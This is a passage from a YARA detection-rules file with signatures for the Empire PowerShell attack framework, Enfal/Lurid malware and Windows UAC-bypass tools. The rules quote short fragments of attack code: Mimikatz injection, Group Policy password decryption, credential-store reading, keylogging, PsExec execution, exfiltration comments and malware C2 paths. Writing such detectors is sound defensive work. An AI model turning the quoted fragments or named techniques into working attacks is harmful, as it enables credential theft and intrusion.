    date = "2016-11-05"
    hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
  strings:
    $x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" ascii fullword
  condition:
    (uint16(0) == 9020 and filesize < 2048000 and 1 of them) or all of them
}

rule Empire_Invoke_Mimikatz_Gen {
  meta:
    description = "Detects Empire component - file Invoke-Mimikatz.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
  strings:
    $s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
    $s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_Get_GPPPassword {
  meta:
    description = "Detects Empire component - file Get-GPPPassword.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
  strings:
    $s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" ascii fullword
    $s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
    $s3 = "function Get-DecryptedCpassword {" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 30720 and 1 of them) or all of them
}

rule Empire_Invoke_SmbScanner {
  meta:
    description = "Detects Empire component - file Invoke-SmbScanner.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
  strings:
    $s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " ascii fullword
    $s2 = "$out | add-member Noteproperty 'Password' $Password" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 10240 and 1 of them) or all of them
}

rule Empire_Exploit_JBoss {
  meta:
    description = "Detects Empire component - file Exploit-JBoss.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
  strings:
    $s1 = "Exploit-JBoss" ascii fullword
    $s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
    $s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
    $s4 = "http://blog.rvrsh3ll.net" ascii fullword
    $s5 = "Remote URL to your own WARFile to deploy." ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 10240 and 1 of them) or all of them
}

rule Empire_dumpCredStore {
  meta:
    description = "Detects Empire component - file dumpCredStore.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
  strings:
    $x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
    $s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" ascii fullword
    $s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" ascii fullword
  condition:
    (uint16(0) == 9020 and filesize < 40960 and 1 of them) or all of them
}

rule Empire_Invoke_EgressCheck {
  meta:
    description = "Detects Empire component - file Invoke-EgressCheck.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
  strings:
    $s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" ascii fullword
  condition:
    (uint16(0) == 9020 and filesize < 10240 and 1 of them) or all of them
}

rule Empire_ReflectivePick_x64_orig {
  meta:
    description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
  strings:
    $s1 = "\\PowerShellRunner.pdb" ascii fullword
    $s2 = "PowerShellRunner.dll" wide fullword
    $s3 = "ReflectivePick_x64.dll" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 409600 and 1 of them) or all of them
}

rule Empire_Out_Minidump {
  meta:
    description = "Detects Empire component - file Out-Minidump.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
  strings:
    $s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," ascii fullword
    $s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 10240 and 1 of them) or all of them
}

rule Empire_Invoke_PsExec {
  meta:
    description = "Detects Empire component - file Invoke-PsExec.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
  strings:
    $s1 = "Invoke-PsExecCmd" ascii fullword
    $s2 = "\"[*] Executing service .EXE" ascii fullword
    $s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
  condition:
    (uint16(0) == 30054 and filesize < 51200 and 1 of them) or all of them
}

rule Empire_Invoke_PostExfil {
  meta:
    description = "Detects Empire component - file Invoke-PostExfil.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
  strings:
    $s1 = "# upload to a specified exfil URI" ascii fullword
    $s2 = "Server path to exfil to." ascii fullword
  condition:
    (uint16(0) == 18698 and filesize < 2048 and 1 of them) or all of them
}

rule Empire_Invoke_SMBAutoBrute {
  meta:
    description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
  strings:
    $s1 = "[*] PDC: LAB-2008-DC1.lab.com" ascii fullword
    $s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 30720 and 1 of them) or all of them
}

rule Empire_Get_Keystrokes {
  meta:
    description = "Detects Empire component - file Get-Keystrokes.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
  strings:
    $s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 30720 and 1 of them) or all of them
}

rule Empire_Invoke_DllInjection {
  meta:
    description = "Detects Empire component - file Invoke-DllInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
  strings:
    $s1 = "-Dll evil.dll" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 40960 and 1 of them) or all of them
}

rule Empire_KeePassConfig {
  meta:
    description = "Detects Empire component - file KeePassConfig.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
  strings:
    $s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" ascii fullword
  condition:
    (uint16(0) == 29219 and filesize < 81920 and 1 of them) or all of them
}

rule Empire_Invoke_SSHCommand {
  meta:
    description = "Detects Empire component - file Invoke-SSHCommand.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
  strings:
    $s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
    $s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" ascii fullword
    $s3 = "Write-Verbose \"[*] Error loading dll\"" ascii fullword
  condition:
    (uint16(0) == 26122 and filesize < 2048000 and 1 of them) or all of them
}

rule Empire_PowerShell_Framework_Gen1 {
  meta:
    description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash2 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
    hash3 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    hash4 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash5 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
  strings:
    $s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
    $s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_PowerUp_Gen {
  meta:
    description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
  strings:
    $s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" ascii fullword
    $s2 = "$Result = sc.exe pause $($TargetService.Name)" ascii fullword
  condition:
    (uint16(0) == 9020 and filesize < 2048000 and 1 of them) or all of them
}

rule Empire_PowerShell_Framework_Gen2 {
  meta:
    description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-ReflectivePEInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
    hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
  strings:
    $x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" ascii fullword
    $s20 = "#Shellcode: CallDllMain.asm" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_Agent_Gen {
  meta:
    description = "Detects Empire component - from files agent.ps1, agent.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
    hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
  strings:
    $s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" ascii fullword
    $s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" ascii fullword
    $s3 = "if ($script:AgentDelay -ne 0){" ascii fullword
  condition:
    (uint16(0) == 26122 and filesize < 102400 and 1 of them) or all of them
}

rule Empire_PowerShell_Framework_Gen3 {
  meta:
    description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
  strings:
    $s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" ascii fullword
    $s2 = "remote DLL injection" ascii
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_Invoke_InveighRelay_Gen {
  meta:
    description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
  strings:
    $s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" ascii fullword
    $s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 204800 and 1 of them) or all of them
}

rule Empire_KeePassConfig_Gen {
  meta:
    description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
  strings:
    $s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" ascii fullword
  condition:
    (uint16(0) == 29219 and filesize < 81920 and 1 of them) or all of them
}

rule Empire_Invoke_Portscan_Gen {
  meta:
    description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
  strings:
    $s1 = "Test-Port -h $h -p $Port -timeout $Timeout" ascii fullword
    $s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 102400 and 1 of them) or all of them
}

rule Empire_PowerShell_Framework_Gen4 {
  meta:
    description = "Detects Empire component - from files Invoke-BypassUAC.ps1, Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DllInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PsExec.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Invoke-Shellcode.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
    hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
    hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
    hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
    hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
    hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
  strings:
    $s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" ascii fullword
    $s2 = "# Get a handle to the module specified" ascii fullword
    $s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" ascii fullword
    $s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen {
  meta:
    description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
  strings:
    $s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" ascii fullword
    $s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 4096000 and 1 of them) or all of them
}

rule Empire_Invoke_Gen {
  meta:
    description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
    hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
  strings:
    $s1 = "$Shellcode1 += 0x48" ascii fullword
    $s2 = "$PEHandle = [IntPtr]::Zero" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 3072000 and 1 of them) or all of them
}

rule Empire_PowerShell_Framework_Gen5 {
  meta:
    description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    super_rule = 1
    hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
    hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
    hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
  strings:
    $s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" ascii fullword
    $s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 1024000 and 1 of them) or all of them
}

rule EnfalCode : Enfal Family {
  meta:
    description = "Enfal code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $decrypt = { B0 20 2A C3 00 04 33 56 43 FF D7 3B D8 }
  condition:
    any of them
}

rule EnfalStrings : Enfal Family {
  meta:
    description = "Enfal Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $ = "D:\\work\\\xe6\xba\x90\xe5\x93\xa5\xe5\x85\x8d\xe6\x9d\x80\\tmp\\Release\\ServiceDll.pdb"
    $ = "e:\\programs\\LuridDownLoader"
    $ = "LuridDownloader for Falcon"
    $ = "DllServiceTrojan"
    $ = "\\k\\\xe6\xa1\x8c\xe8\x9d\xa2\\"
    $ = "EtenFalcon\xef\xbc\x88\xe4\xbf\xae\xe6\x94\xb9\xef\xbc\x89"
    $ = "Madonna\x00Jesus"
    $ = "/iupw82/netstate"
    $ = "fuckNodAgain"
    $ = "iloudermao"
    $ = "Crpq2.cgi"
    $ = "Clnpp5.cgi"
    $ = "Dqpq3ll.cgi"
    $ = "dieosn83.cgi"
    $ = "Rwpq1.cgi"
    $ = "/Ccmwhite"
    $ = "/Cmwhite"
    $ = "/Crpwhite"
    $ = "/Dfwhite"
    $ = "/Query.txt"
    $ = "/Ufwhite"
    $ = "/cgl-bin/Clnpp5.cgi"
    $ = "/cgl-bin/Crpq2.cgi"
    $ = "/cgl-bin/Dwpq3ll.cgi"
    $ = "/cgl-bin/Owpq4.cgi"
    $ = "/cgl-bin/Rwpq1.cgi"
    $ = "/trandocs/mm/"
    $ = "/trandocs/netstat"
    $ = "NFal.exe"
    $ = "LINLINVMAN"
    $ = "7NFP4R9W"
  condition:
    any of them
}

rule Enfal : Family {
  meta:
    description = "Enfal"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  condition:
    EnfalCode or EnfalStrings
}

rule Enfal_Malware {
  meta:
    description = "Detects a certain type of Enfal Malware"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/02/10"
    hash = "9639ec9aca4011b2724d8e7ddd13db19913e3e16"
    score = 60
  strings:
    $s0 = "POWERPNT.exe" ascii fullword
    $s1 = "%APPDATA%\\Microsoft\\Windows\\" ascii fullword
    $s2 = "%HOMEPATH%" ascii fullword
    $s3 = "Server2008" ascii fullword
    $s4 = "Server2003" ascii fullword
    $s5 = "Server2003R2" ascii fullword
    $s6 = "Server2008R2" ascii fullword
    $s9 = "%HOMEDRIVE%" ascii fullword
    $s13 = "%ComSpec%" ascii fullword
  condition:
    all of them
}

rule Enfal_Malware_Backdoor {
  meta:
    description = "Generic Rule to detect the Enfal Malware"
    author = "Florian Roth"
    date = "2015/02/10"
    super_rule = 1
    hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
    hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
    hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
    score = 60
  strings:
    $mz = { 4D 5A }
    $x1 = "Micorsoft Corportation" wide fullword
    $x2 = "IM Monnitor Service" wide fullword
    $s1 = "imemonsvc.dll" wide fullword
    $s2 = "iphlpsvc.tmp" fullword
    $z1 = "urlmon" fullword
    $z2 = "Registered trademarks and service marks are the property of their respec" wide
    $z3 = "XpsUnregisterServer" fullword
    $z4 = "XpsRegisterServer" fullword
    $z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
  condition:
    ($mz at 0) and (1 of ($x*) or (all of ($s*) and all of ($z*)))
}

rule ce_enfal_cmstar_debug_msg {
  meta:
    Author = "rfalcone"
    Date = "2015.05.10"
    Description = "Detects the static debug strings within CMSTAR"
    Reference = "http://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin"
  strings:
    $d1 = "EEE\x0d\x0a" fullword
    $d2 = "TKE\x0d\x0a" fullword
    $d3 = "VPE\x0d\x0a" fullword
    $d4 = "VPS\x0d\x0a" fullword
    $d5 = "WFSE\x0d\x0a" fullword
    $d6 = "WFSS\x0d\x0a" fullword
    $d7 = "CM**\x0d\x0a" fullword
  condition:
    uint16(0) == 23117 and all of ($d*)
}

rule Win7Elevatev2 {
  meta:
    description = "Detects Win7Elevate - Windows UAC bypass utility"
    author = "Florian Roth"
    reference = "http://www.pretentiousname.com/misc/W7E_Source/Win7Elevate_Inject.cpp.html"
    date = "2015-05-14"
    hash1 = "4f53ff6a04e46eda92b403faf42219a545c06c29"
    hash2 = "808d04c187a524db402c5b2be17ce799d2654bd1"
    score = 60
  strings:
    $x1 = "This program attempts to bypass Windows 7's default UAC settings to run " wide
    $x2 = "Win7ElevateV2\\x64\\Release\\" ascii
    $x3 = "Run the command normally (without code injection)" wide
    $x4 = "Inject file copy && elevate command" wide fullword
    $x5 = "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html" wide fullword
    $x6 = "For injection, pick any unelevated Windows process with ASLR on:" wide fullword
    $s1 = "\\cmd.exe" wide
    $s2 = "runas" wide
    $s3 = "explorer.exe" wide
    $s4 = "Couldn't load kernel32.dll" wide
    $s5 = "CRYPTBASE.dll" wide
    $s6 = "shell32.dll" wide
    $s7 = "ShellExecuteEx" ascii
    $s8 = "COMCTL32.dll" ascii
    $s9 = "ShellExecuteEx" ascii
    $s10 = "HeapAlloc" ascii
  condition:
    uint16(0) == 23117 and (1 of ($x*) or all of ($s*))
}

rule UACME_Akagi {
  meta:
    description = "Rule to detect UACMe - abusing built-in Windows AutoElevate backdoor"
    author = "Florian Roth"
    reference = "https://github.com/hfiref0x/UACME"
    date = "2015-05-14"
    hash1 = "edd2138bbd9e76c343051c6dc898054607f2040a"
    hash2 = "e3a919ccc2e759e618208ededa8a543954d49f8a"
    score = 60
  strings:
    $x1 = "UACMe injected, Fubuki at your service." wide fullword
    $x3 = "%temp%\\Hibiki.dll" wide fullword
    $x4 = "[UCM] Cannot write to the target process memory." wide fullword
    $s1 = "%systemroot%\\system32\\cmd.exe" wide
    $s2 = "D:(A;;GA;;;WD)" wide
    $s3 = "%systemroot%\\system32\\sysprep\\sysprep.exe" wide fullword
    $s4 = "/c wusa %ws /extract:%%windir%%\\system32" wide fullword
    $s5 = "Fubuki.dll" ascii fullword
    $l1 = "ntdll.dll" ascii
    $l2 = "Cabinet.dll" ascii
    $l3 = "GetProcessHeap" ascii
    $l4 = "WriteProcessMemory" ascii
    $l5 = "ShellExecuteEx" ascii
  condition:
    (1 of ($x*)) or (3 of ($s*) and all of ($l*))
}

rule UACElevator {
  meta:
    description = "UACElevator bypassing UAC - file UACElevator.exe"
    author = "Florian Roth"
    reference = "https://github.com/MalwareTech/UACElevator"
    date = "2015-05-14"
    hash = "fd29d5a72d7a85b7e9565ed92b4d7a3884defba6"
  strings:
    $x1 = "\\UACElevator.pdb" ascii
    $s1 = "%userprofile%\\Downloads\\dwmapi.dll" ascii fullword
    $s2 = "%windir%\\system32\\dwmapi.dll" ascii fullword
    $s3 = "Infection module: %s" ascii fullword
    $s4 = "Could not save module to %s" ascii fullword
    $s5 = "%s%s%p%s%ld%s%d%s" ascii fullword
    $s6 = "Stack area around _alloca memory reserved by this function is corrupted" ascii fullword
    $s7 = "Stack around the variable '" ascii fullword
    $s8 = "MSVCR120D.dll" wide fullword
    $s9 = "Address: 0x" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 176128 and ($x1 or 8 of ($s*))
}

rule s4u {
  meta:
    description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
    author = "Florian Roth"
    reference = "https://github.com/aurel26/s-4-u-for-windows"
    date = "2015-06-05"
    hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
    score = 50
  strings:
    $x0 = "s4u.exe Domain\\Username [Extra SID]" ascii fullword
    $x1 = "\\Release\\s4u.pdb" ascii
    $s0 = "CreateProcessAsUser failed (error %u)." ascii fullword
    $s1 = "GetTokenInformation failed (error: %u)." ascii fullword
    $s2 = "LsaLogonUser failed (error 0x%x)." ascii fullword
    $s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" ascii fullword
    $s4 = "LookupPrivilegeValue failed (error: %u)." ascii fullword
    $s5 = "The token does not have the specified privilege (%S)." ascii fullword
    $s6 = "Unable to parse command line." ascii fullword
    $s7 = "Unable to find logon SID." ascii fullword
    $s8 = "AdjustTokenPrivileges failed (error: %u)." ascii fullword
    $s9 = "AdjustTokenPrivileges (%S): OK" ascii fullword
    $g1 = "%systemroot%\\system32\\cmd.exe" wide
    $g2 = "SeTcbPrivilege" wide
    $g3 = "winsta0\\default" wide
    $g4 = ".rsrc"
    $g5 = "HeapAlloc"
    $g6 = "GetCurrentProcess"
    $g7 = "HeapFree"
    $g8 = "GetProcessHeap"
    $g9 = "ExpandEnvironmentStrings"
    $g10 = "ConvertStringSidToSid"
    $g11 = "LookupPrivilegeValue"
    $g12 = "AllocateLocallyUniqueId"
    $g13 = "ADVAPI32.dll"
    $g14 = "LsaLookupAuthenticationPackage"
    $g15 = "Secur32.dll"
    $g16 = "MSVCR120.dll"
  condition:
    uint16(0) == 23117 and filesize < 61440 and (1 of ($x*) or all of ($s*) or all of ($g*))
}

rule EzcobStrings : Ezcob Family {
  meta:
    description = "Ezcob Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  strings:
